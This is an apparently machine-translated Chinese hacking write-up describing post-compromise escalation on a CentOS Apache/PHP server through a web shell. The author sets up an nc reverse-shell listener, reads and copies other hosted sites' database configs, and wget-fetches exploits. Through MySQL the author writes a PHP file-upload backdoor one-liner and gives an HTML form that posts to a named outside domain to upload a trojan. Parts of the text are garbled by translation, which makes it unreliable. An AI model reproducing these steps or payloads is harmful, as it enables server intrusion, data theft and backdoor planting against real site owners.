Low-privilege elevation in LINUX

Source: Internet
Author: User

Author: hackdn

Today, the client received a SHELL of Apache/2.2.3 (CentOS), which is written into the LINUX system. The PHP version 5.2.17 and MYSSQL environment were created without ASP and. NET.

First use the built-in command LS, UNAME, and no explicit, it must have set PHP. INI. The root directory has no write permission. It is estimated that CHMOD 777 will not be available even if it rebounded.

First, try to create a file in tmp, run the SHELL directory, execute the file, and launch the local NC listener. WHOAMI is the WWWROOT permission.

View version

You can CD it to the root directory (/var/www/virtual/) and then LS it. The entire website is out, and the folder name is not blind to the target site, but you do not have the permission to jump in.

Try to package TAR with no permissions. Try to package the target site directory file separately. Yes, but the root directory CONN. CONFIG is limited to the read permission of the current target site.

If you try to include the directory in the CP target station, you can copy the directory, but you cannot copy it. You can find the database configuration information and then run it on another server.

Back up the database with phpspyshell:

Some configuration information and accounts are viewed, but there is no background path or other sensitive information

The scan tool cannot scan the target website folder. It is estimated that it has been modified.

I tried to escalate the authority of mongoshell to USER or ROOT. I didn't directly look at Apache configuration settings. I tried WGET a few EXP, but it was useless. It is estimated that I had patched it.

Although CP can, but do not know the specific information

Since the WEB has no permissions, try MYSQL to see if it has permissions.

Direct

Create table hackdn (spider BLOB); CREATE a TABLE hackdn

Save one sentence

Back up the file to the target path 1. php. No connection is found.

CP, separated by anti-translated characters,

If 'is not added, insert <? Copy ($ _ FILES [MyFile] [tmp_name], $ _ FILES [MyFile] [name]);?>

After the backup is made to PHP, save the following code locally: 1. HTML

<Form ENCTYPE = "multipart/form-data" ACTION = "http://www.bkjia.com/mysql_bak/1.php" METHOD =" POST ">


<Input NAME = "MyFile" TYPE = "file">
<Input VALUE = "submit" TYPE = "submit">
</Form>

Upload the trojan directly and click OK.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.